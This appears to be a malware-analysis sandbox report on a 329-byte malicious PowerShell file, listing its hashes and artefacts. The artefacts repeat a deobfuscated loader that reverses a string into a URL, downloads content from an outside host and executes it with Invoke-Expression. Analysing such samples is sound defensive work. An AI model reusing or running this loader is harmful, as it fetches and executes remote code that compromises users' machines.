Malicious

c0b937e9cfd89c50cf31c8bd9c4389a6

PowerShell
|
MD5: c0b937e9cfd89c50cf31c8bd9c4389a6
|
Size: 329 B
|
application/x-powershell

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	c0b937e9cfd89c50cf31c8bd9c4389a6
Sha1	6b2710147413aff250b23f0b17fa70bd490ddcf7
Sha256	fe89527b0bb68f62503ead24c965626879d188527769492394bfe230e6af4a76
Sha384	aab356cac60888c323810a2a84e9116c7174aee177fcbbd5d6547b7f6fbecf614ceb06caead24c8d5dc67b3fafbb641c
Sha512	18ee2e40ed27dee57b437f3902b1a36217ff14c2499090a9bcc0abb1e61f8c5ebba0fa598def5515de25f5749015800c324d0fab8dddf8ab094e325493924c38
SSDeep	6:SZ2JeJvFNHMBT2FvAk9xsEq/mVgyh2wNyrA3xO4ziFUci0PILh8Jd4zyK0y:g2YlFNsd2FYkrRq/MxkPUB0CGH4zyLy
TLSH	04E07D39112213204958D0A18898E4FCC370501212182F707A491AD64193FE9B9392CC

File Structure

Artefacts

Name0	Value
Deobfuscated PowerShell	$r = "qgnkb/gro.arutpaccresgnkbamq//:sptth" $u = $r[($r."Length" - 1) .. 0] Invoke-Expression (Invoke-WebRequest -Uri $u -UseBasicParsing)."Content"
Deobfuscated PowerShell	$r = "qgnkb/gro.arutpaccresgnkbamq//:sptth" $u = $r[($r."Length" - 1) .. 0] Invoke-Expression (Invoke-WebRequest -Uri $u -UseBasicParsing)."Content"

c0b937e9cfd89c50cf31c8bd9c4389a6 (329 B)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
Deobfuscated PowerShell	$r = "qgnkb/gro.arutpaccresgnkbamq//:sptth" $u = $r[($r."Length" - 1) .. 0] Invoke-Expression (Invoke-WebRequest -Uri $u -UseBasicParsing)."Content" Malicious	c0b937e9cfd89c50cf31c8bd9c4389a6
Deobfuscated PowerShell	$r = "qgnkb/gro.arutpaccresgnkbamq//:sptth" $u = $r[($r."Length" - 1) .. 0] Invoke-Expression (Invoke-WebRequest -Uri $u -UseBasicParsing)."Content" Malicious	c0b937e9cfd89c50cf31c8bd9c4389a6 > [Deobfuscated PS]

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙